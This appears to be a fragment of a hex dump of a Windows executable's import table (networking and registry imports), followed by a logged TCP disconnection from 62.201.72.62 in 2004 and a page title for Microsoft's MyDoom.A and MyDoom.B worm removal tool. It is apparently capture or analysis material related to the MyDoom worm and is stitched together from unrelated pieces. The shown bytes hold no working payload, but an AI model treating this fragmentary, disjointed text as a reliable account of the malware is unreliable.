1210 00 8C 60 00 00 64 60 00 00 00 00 00 00 00 00 00 ..`..d`.........
1220 00 00 00 00 00 99 60 00 00 74 60 00 00 00 00 00 ......`..t`.....
1230 00 00 00 00 00 00 00 00 00 A6 60 00 00 7C 60 00 ..........`..|`.
1240 00 00 00 00 00 00 00 00 00 00 00 00 00 B1 60 00 ..............`.
1250 00 84 60 00 00 00 00 00 00 00 00 00 00 00 00 00 ..`.............
1260 00 00 00 00 00 00 00 00 00 BC 60 00 00 CA 60 00 ..........`...`.
1270 00 DA 60 00 00 00 00 00 00 E8 60 00 00 00 00 00 ..`.......`.....
1280 00 F6 60 00 00 00 00 00 00 0A 00 00 80 00 00 00 ..`.............
1290 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 41 44 .KERNEL32.DLL.AD
12A0 56 41 50 49 33 32 2E 64 6C 6C 00 55 53 45 52 33 VAPI32.dll.USER3
12B0 32 2E 64 6C 6C 00 57 53 32 5F 33 32 2E 64 6C 6C 2.dll.WS2_32.dll
12C0 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 ...LoadLibraryA.
12D0 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 .GetProcAddress.
12E0 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 52 .ExitProcess...R
12F0 65 67 43 6C 6F 73 65 4B 65 79 00 00 00 77 73 70 egCloseKey...wsp
1300 72 69 6E 74 66 41 00 00 00 00 00 00 00 00 00 00 rintfA..........
1310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
13A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
13B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
13C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
13D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
13E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
13F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1400 00 00 00 00 00 .....


62.201.72.62 : 1492 TCP Disconnected ID = 5
--- 12/02/2004 12:51:54.406
Status Code: 0 OK
 

MyDoom.A and MyDoom.B worm Removal Tool from Microsoft

 

Page last updated on February 12, 2004